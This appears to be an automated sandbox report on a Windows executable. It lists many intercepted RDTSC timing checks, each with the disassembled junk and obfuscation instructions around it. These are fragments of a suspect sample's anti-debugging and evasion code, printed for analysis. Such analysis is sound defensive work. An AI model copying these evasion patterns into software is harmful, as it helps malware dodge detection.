Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9926FF second address: 992726 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E055074FFh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0E055074FCh 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 992726 second address: 99274C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jbe 00007F0E05506CE6h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0E05506CEFh 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 99274C second address: 992766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F0E055074F6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F0E055074F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9492C second address: A94954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF2h 0x00000009 jmp 00007F0E05506CF2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9BEF4 second address: A9BF02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0E055074F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9BF02 second address: A9BF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C342 second address: A9C34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C7A3 second address: A9C7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C7AA second address: A9C7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0E055074F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C7B4 second address: A9C80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0E05506CEEh 0x00000011 jmp 00007F0E05506CF2h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0E05506CEFh 0x00000020 jng 00007F0E05506CECh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCA9 second address: A9FCE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F0E055074FCh 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 je 00007F0E055074F8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop esi 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 jno 00007F0E055074F8h 0x00000027 push eax 0x00000028 push edx 0x00000029 ja 00007F0E055074F6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCE0 second address: A9FCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCE4 second address: A9FCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCF2 second address: A9FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA2CBE second address: AA2CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA4D2A second address: AA4D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F0E05506CE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA4D38 second address: AA4D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507500h 0x00000007 jmp 00007F0E05507504h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA4D60 second address: AA4D7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E05506CF7h 0x00000008 jmp 00007F0E05506CF1h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA030F second address: 4DA0320 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 3DFC186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0320 second address: 4DA0333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0333 second address: 4DA03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007F0E055074FBh 0x0000000b add esi, 6377FEBEh 0x00000011 jmp 00007F0E05507509h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a call dword ptr [7598188Ch] 0x00000020 mov edi, edi 0x00000022 push ebp 0x00000023 mov ebp, esp 0x00000025 push ecx 0x00000026 mov ecx, dword ptr [7FFE0004h] 0x0000002c mov dword ptr [ebp-04h], ecx 0x0000002f cmp ecx, 01000000h 0x00000035 jc 00007F0E05538FD5h 0x0000003b mov eax, 7FFE0320h 0x00000040 mov eax, dword ptr [eax] 0x00000042 mul ecx 0x00000044 shrd eax, edx, 00000018h 0x00000048 mov esp, ebp 0x0000004a pop ebp 0x0000004b ret 0x0000004c pushad 0x0000004d mov bx, si 0x00000050 call 00007F0E05507508h 0x00000055 mov edx, eax 0x00000057 pop esi 0x00000058 popad 0x00000059 pop ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F0E055074FFh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA03A1 second address: 4DA03BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA03BE second address: 4DA03C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA03C3 second address: 4DA0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 74D88A90h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ret 0x0000000d nop 0x0000000e xor esi, eax 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 push eax 0x00000014 call 00007F0E09EA3975h 0x00000019 mov edi, edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0E05506CF3h 0x00000022 or cx, 491Eh 0x00000027 jmp 00007F0E05506CF9h 0x0000002c popfd 0x0000002d mov ecx, 28AC7AE7h 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007F0E05506CEAh 0x00000039 push eax 0x0000003a jmp 00007F0E05506CEBh 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0E05506CF0h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0286 second address: 4DA028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA028A second address: 4DA0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0290 second address: 4DA02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d call 00007F0E05507502h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5001B second address: 4D50040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50040 second address: 4D50045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50045 second address: 4D5008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dx, 73CAh 0x0000000f pushfd 0x00000010 jmp 00007F0E05506CEBh 0x00000015 add ax, CE6Eh 0x0000001a jmp 00007F0E05506CF9h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5008D second address: 4D50091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50091 second address: 4D50097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50097 second address: 4D500E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 28h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E05507502h 0x00000015 sub ch, 00000048h 0x00000018 jmp 00007F0E055074FBh 0x0000001d popfd 0x0000001e call 00007F0E05507508h 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D500E2 second address: 4D50175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 mov dh, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr fs:[00000030h] 0x00000010 jmp 00007F0E05506CF5h 0x00000015 sub esp, 18h 0x00000018 jmp 00007F0E05506CEEh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F0E05506CF0h 0x00000023 push eax 0x00000024 jmp 00007F0E05506CEBh 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F0E05506CEBh 0x00000033 sub ax, 6EAEh 0x00000038 jmp 00007F0E05506CF9h 0x0000003d popfd 0x0000003e jmp 00007F0E05506CF0h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50175 second address: 4D5019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E05507505h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5019E second address: 4D501A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D501A3 second address: 4D5021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E055074FDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d jmp 00007F0E055074FEh 0x00000012 push eax 0x00000013 jmp 00007F0E055074FBh 0x00000018 xchg eax, esi 0x00000019 jmp 00007F0E05507506h 0x0000001e mov esi, dword ptr [759B06ECh] 0x00000024 jmp 00007F0E05507500h 0x00000029 test esi, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0E05507507h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5021A second address: 4D50220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50220 second address: 4D5023D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0E0550857Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5023D second address: 4D50241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50241 second address: 4D50245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50245 second address: 4D5024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5024B second address: 4D502BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05507508h 0x00000009 and si, 6668h 0x0000000e jmp 00007F0E055074FBh 0x00000013 popfd 0x00000014 mov ax, 645Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d push ecx 0x0000001e mov dl, C9h 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007F0E05507509h 0x00000027 or ax, 4736h 0x0000002c jmp 00007F0E05507501h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D502BD second address: 4D502C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D502C4 second address: 4D50326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E055074FBh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov ah, bl 0x00000012 call 00007F0E055074FCh 0x00000017 pushfd 0x00000018 jmp 00007F0E05507502h 0x0000001d and ah, FFFFFFE8h 0x00000020 jmp 00007F0E055074FBh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 call dword ptr [75980B60h] 0x0000002e mov eax, 75F3E5E0h 0x00000033 ret 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0E05507502h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50326 second address: 4D5037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F0E05506CEDh 0x0000000b or ah, FFFFFFB6h 0x0000000e jmp 00007F0E05506CF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000044h 0x00000019 jmp 00007F0E05506CEEh 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0E05506CF7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5037B second address: 4D503A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov bx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E05507509h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D503A3 second address: 4D503A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D503A9 second address: 4D503CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507503h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 523067D1h 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D503CE second address: 4D5043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0E05506CF4h 0x00000011 adc esi, 3B9F4088h 0x00000017 jmp 00007F0E05506CEBh 0x0000001c popfd 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 push dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F0E05506CECh 0x0000002c add esi, 50E5A2E8h 0x00000032 jmp 00007F0E05506CEBh 0x00000037 popfd 0x00000038 mov bx, si 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5043A second address: 4D50441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 16h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50441 second address: 4D50454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50454 second address: 4D50458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50458 second address: 4D5045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5045E second address: 4D50464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50464 second address: 4D50468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50468 second address: 4D50479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax+18h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov di, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50491 second address: 4D5050A instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F0E05506CF4h 0x0000000c pushfd 0x0000000d jmp 00007F0E05506CF2h 0x00000012 xor ah, 00000038h 0x00000015 jmp 00007F0E05506CEBh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d mov esi, eax 0x0000001f jmp 00007F0E05506CEFh 0x00000024 test esi, esi 0x00000026 jmp 00007F0E05506CF6h 0x0000002b je 00007F0E760E5E95h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 07E1BEE0h 0x00000039 push ebx 0x0000003a pop ecx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5050A second address: 4D50531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05507500h 0x00000009 xor si, 6128h 0x0000000e jmp 00007F0E055074FBh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50531 second address: 4D5054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub eax, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F0E05506CEEh 0x00000011 pop eax 0x00000012 mov al, dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5054F second address: 4D5058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007F0E055074FEh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E05507507h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5058C second address: 4D505EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05506CEFh 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+08h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F0E05506CF7h 0x00000018 adc cx, 1B3Eh 0x0000001d jmp 00007F0E05506CF9h 0x00000022 popfd 0x00000023 pop ecx 0x00000024 mov di, 21B4h 0x00000028 popad 0x00000029 mov dword ptr [esi+0Ch], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505EE second address: 4D505F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505F2 second address: 4D505F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505F6 second address: 4D505FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505FC second address: 4D5060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5060A second address: 4D5060E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5060E second address: 4D50660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f push eax 0x00000010 mov edi, 5295F298h 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [esi+10h], eax 0x0000001a pushad 0x0000001b mov ch, E7h 0x0000001d pushad 0x0000001e mov edx, 1D71A274h 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+50h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov bx, si 0x0000002e pushfd 0x0000002f jmp 00007F0E05506CF0h 0x00000034 adc ecx, 30CF3428h 0x0000003a jmp 00007F0E05506CEBh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50660 second address: 4D50678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507504h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50678 second address: 4D506A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E05506CF5h 0x00000015 rdtsc
